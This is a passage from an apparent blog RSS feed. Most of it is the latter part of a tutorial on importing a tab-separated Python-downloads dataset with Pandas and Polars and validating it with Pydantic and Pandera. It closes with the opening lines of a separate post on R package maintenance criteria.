&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydantic&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; BaseModel, NonNegativeInt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;Person&lt;/span&gt;(BaseModel):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name: str
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age: NonNegativeInt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Correct data-types cause no fuss:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Person(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ&amp;#34;&lt;/span&gt;, age&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;47&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Person(name='Russ', age=47)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But incorrect data (here a negative age) throw errors:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Person(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Buddy&amp;#34;&lt;/span&gt;, age&lt;span style="color:#ff7b72;font-weight:bold"&gt;=-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pydantic_core._pydantic_core.ValidationError: 1 validation error for Person
## age
## Input should be greater than or equal to 0 [type=greater_than_equal, input_value=-1, input_type=int]
## For further information visit https://errors.pydantic.dev/2.11/v/greater_than_equal
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are extensions of Pydantic that work with data-frames. For
example, &lt;a href="https://pandera.readthedocs.io/en/stable/index.html" rel="external"&gt;Pandera&lt;/a&gt;
can work with Pandas, Polars and several other data-frame libraries. You
would need to install a different Pandera extension depending on the
data-frame library you are working with (“pandera[pandas]” for Pandas,
“pandera[polars]” for Polars etc).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Terminal
pip install &amp;quot;pandera[pandas]&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandera.pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pa&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrameSchema({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(str, nullable&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(float, checks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Check&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;in_range(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(int)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pandera.errors.SchemaError: non-nullable series 'percent' contains null values:
## 17 NaN
## 18 NaN
## Name: percent, dtype: object
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Validation of the data has identified an issue with the dataset. There
is a missing value in the “percent” column towards the end of the
dataset. There are other issues - the two numeric columns are currently
strings - but lets check out the issue that Pandera has identified
first.&lt;/p&gt;
&lt;p&gt;This is the end of the dataset:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tail()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 14 3.3 0.00% 2,259
## 15 2.6 0.00% 87
## 16 3.2 0.00% 68
## 17 Total NaN 1,206,596,056
## 18 Date range: 2024-12-31 - 2025-07-07 NaN NaN
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is some metadata included in the final couple of lines of the
dataset that should be ignored at import. Let’s just ignore the final
couple of lines at import (this isn’t a very robust solution, but is
fine for now).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;, nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tail()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 12 3.40 0.00% 12,777
## 13 3.15 0.00% 2,882
## 14 3.30 0.00% 2,259
## 15 2.60 0.00% 87
## 16 3.20 0.00% 68
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now if we validate the Pandas data-frame, another issue has been
identified.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pandera.errors.SchemaError: expected series 'category' to have type str:
## failure cases:
## index failure_case
## 0 0 3.11
## 1 1 3.90
## 2 2 3.10
## 3 3 3.12
## 4 5 3.80
## 5 6 3.13
## 6 7 3.70
## 7 8 3.60
## 8 9 2.70
## 9 10 3.14
## 10 11 3.50
## 11 12 3.40
## 12 13 3.15
## 13 14 3.30
## 14 15 2.60
## 15 16 3.20
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is a more substantial issue - the Python version-strings (3.2, 3.3
and so on) have been converted into floating-point numbers during
import. So now Python version “3.2” is Python 3.20 in the data-frame.&lt;/p&gt;
&lt;p&gt;Rich Iannone has written a useful blog post comparing various
data-validation libraries for Polars at the &lt;a href="https://posit-dev.github.io/pointblank/blog/validation-libs-2025/" rel="external"&gt;“Posit-dev”
blog&lt;/a&gt;.
The tools mentioned in his post can check more substantial matters than
the missing-data, data-type and data-range issues that we mentioned
above. In particular, the tool
&lt;a href="https://posit-dev.github.io/pointblank/" rel="external"&gt;“pointblank”&lt;/a&gt; can create
data-validation summary reports that can be used to report back to
data-collection teams or to analysts. Python already had data-reporting
tools like &lt;a href="https://docs.greatexpectations.io/docs/core/introduction/" rel="external"&gt;“great
expectations”&lt;/a&gt;
and &lt;a href="https://www.tdda.info/" rel="external"&gt;“test-driven data analysis”&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="importing-with-data-type-constraints"&gt;Importing with data-type constraints&lt;/h2&gt;
&lt;p&gt;I knew the structure of the tab-separated file before attempting to load
it with Pandas and Polars. That is, I knew that the percents looked like
“12.34%” and that the download counts looked like “123,456,789” (with
commas separating the thousands and millions). Neither package can
automatically convert these number formats into the format that they
require without a bit of help. Even if we explained what the post-import
data-type should be for each column, the two libraries wouldn’t be able
to parse the input data directly.&lt;/p&gt;
&lt;p&gt;Both Polars and Pandas allow you to provide a pre-defined schema when
importing data. For Pandas, you provide a &lt;code&gt;dtype&lt;/code&gt; dictionary which
specifies what the output column data-type should be. For Polars, you
provide a &lt;code&gt;schema&lt;/code&gt; argument, where the data-types are specified in a
Polars-specific format (because the data is stored in Rust, the Python
&lt;code&gt;int&lt;/code&gt; and &lt;code&gt;str&lt;/code&gt; data-types don’t work for Polars).&lt;/p&gt;
&lt;p&gt;If we import our data using a schema, Pandas and Polars will complain:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: str, &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: float, &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: int}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## ValueError: could not convert string to float: '23.40%'
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Utf8, &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Float64, &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Int64}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## polars.exceptions.ComputeError: could not parse `&amp;quot;23.40%&amp;quot;` as dtype `f64` at column 'percent' (column number 2)
##
## The current offset in the file is 7 bytes.
##
## You might want to try:
## - increasing `infer_schema_length` (e.g. `infer_schema_length=10000`),
## - specifying correct dtype with the `schema_overrides` argument
## - setting `ignore_errors` to `True`,
## - adding `&amp;quot;23.40%&amp;quot;` to the `null_values` list.
##
## Original error: ```remaining bytes non-empty```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The errors arise because we need to also specify how to convert our data
into the expected data-types when it isn’t obvious. This is done using
‘converters’ in Pandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: str},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; converters &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 12.34% -&amp;gt; 12.34&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: float(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;strip(&lt;span style="color:#a5d6ff"&gt;&amp;#34;%&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 123,456,789 -&amp;gt; 123456789&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: int(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace(&lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40 282343944
## 1 3.9 18.78 226548604
## 2 3.10 18.74 226155405
## 3 3.12 15.48 186819921
## 4 NaN 8.41 101489156
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In Polars, the &lt;code&gt;with_columns()&lt;/code&gt; method allows conversion to the expected
data-types.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;with_columns(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 12.34% -&amp;gt; 12.34&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;str&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace(&lt;span style="color:#a5d6ff"&gt;&amp;#34;%&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cast(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Float64),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 123,456,789 -&amp;gt; 123456789&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;str&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace_all(&lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;cast(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Int64)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## shape: (5, 3)
## ┌──────────┬─────────┬───────────┐
## │ category ┆ percent ┆ downloads │
## │ --- ┆ --- ┆ --- │
## │ str ┆ f64 ┆ i64 │
## ╞══════════╪═════════╪═══════════╡
## │ 3.11 ┆ 23.4 ┆ 282343944 │
## │ 3.9 ┆ 18.78 ┆ 226548604 │
## │ 3.10 ┆ 18.74 ┆ 226155405 │
## │ 3.12 ┆ 15.48 ┆ 186819921 │
## │ null ┆ 8.41 ┆ 101489156 │
## └──────────┴─────────┴───────────┘
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now if we validate our datasets against the Pandera schema, we should
have a little more success:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40 282343944
## 1 3.9 18.78 226548604
## 2 3.10 18.74 226155405
## 3 3.12 15.48 186819921
## 4 NaN 8.41 101489156
## 5 3.8 6.13 73965471
## 6 3.13 4.91 59253846
## 7 3.7 3.36 40551618
## 8 3.6 0.54 6546017
## 9 2.7 0.20 2371860
## 10 3.14 0.02 300816
## 11 3.5 0.02 231325
## 12 3.4 0.00 12777
## 13 3.15 0.00 2882
## 14 3.3 0.00 2259
## 15 2.6 0.00 87
## 16 3.2 0.00 68
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nice.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this post we have looked at importing data with both Pandas and
Polars. We have seen that the import functions are similar
(&lt;code&gt;read_csv(...)&lt;/code&gt;) but that there are some subtle differences with how
you specify some things (the column separator argument, the data-schema
and so on). Explicit conversion of the imported data is performed
differently between the two packages as well.&lt;/p&gt;
&lt;p&gt;Once your data has been imported, you should check that it contains what
it is supposed to: are the columns you need all present, do they store
the correct data-types, do the values within those columns sit within
the expected range. Data validation libraries, like Pointblank and
Panderas are really useful for checking data-schema and data-values
before you do anything critical with your dataset.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-data-import/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Maintainer Criteria</title><link>https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/</link><pubDate>Tue, 15 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is final part of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt; (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At last we come to the final post!
Over the previous four posts, we considered all aspects of how we validate package.
As we&amp;rsquo;ve constantly repeated, most individual scores &lt;strong&gt;aren&amp;rsquo;t that important&lt;/strong&gt;.
Instead, it&amp;rsquo;s the cumulative effect that&amp;rsquo;s important; it gives us a hint of where to spend our energy.&lt;/p&gt;
